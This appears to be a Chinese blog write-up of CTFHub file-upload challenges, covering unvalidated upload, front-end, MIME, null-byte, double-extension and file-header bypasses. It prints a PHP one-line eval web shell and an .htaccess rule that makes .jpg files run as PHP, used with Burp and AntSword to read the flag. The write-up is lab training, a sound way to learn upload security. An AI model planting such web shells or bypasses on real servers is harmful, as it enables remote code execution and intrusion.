【原创】ctfhub技能树—文件上传

无验证

[huayang]Flag

我们在本地新建个文件随便起个名字

写如下列代码

<?php
@eval(@$_POST['g']);
?>

这就是大名鼎鼎的一句话木马

现在我们上传

上传成功我们来到蚁剑

步骤

网址一定要写上传文件的具体地址

密码就是我们代码里的g

双击打开

点击html在打开这个文件flag就出来啦

前端验证

Flag

既然说验证我们先上传两个个文件看看

很明显是绕过

上传png文件用burp改后缀

再用蚁剑就可以看见flag了

.htaccess

Flag

既然都说了.htaccess

创建一个.htaccess文件写如下列代码

AddType application/x-httpd-php .jpg

意思就是把上传的jpg文件以php格式运行

当然也可以改为png文件

接着先上传.htaccess文件

成功后再上传有一句话的.jpg文件

然后用蚁剑用同样的方法即可找到flag

MIME绕过

Flag

想直接点的可通过前端验证的方法拿到flag

咱们跟着过程走

咱们先上传一个php文件抓包来看看

可以看见是同通过Content-Type来验证的

咱么再上传一个jpg的文件看看有什么变化

所以我们只需要把上面的验证改成这个就可以了

像这样

点击发送

后面的不用我说了吧

00截断

Flag

日常抓包

把文件名改为xx.php.jpg

然后再post后面加上1.php%00就行了

后面的又不用我说了吧

地址还是:http://challenge-8e1df66dafc60e23.sandbox.ctfhub.com:10080/upload/1.php

双写后缀

Flag

老方法试探一下

太简单了吧。。。

很明显是过滤php,写成这样就(从过滤是左到右)把中间的PHP过滤了剩下’p’与’hp’组合起来刚好是php

然后重复上面的方法找到flag

文件头检查

Flag

1.写入一句话

2.改成图片文件(这里演示的是png)

3.使用winhex工具更改文件PNG的16进制文件头是89504E47

这里记得要按ins键到右边的样子

4.上传抓包

5.改后缀发送

6.同上

完![/huayang]

==>转载请注明来源哦<==

评论

  1. 华扬
    华扬 博主
    11月前
    2021-2-25 16:32:49

    康康

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇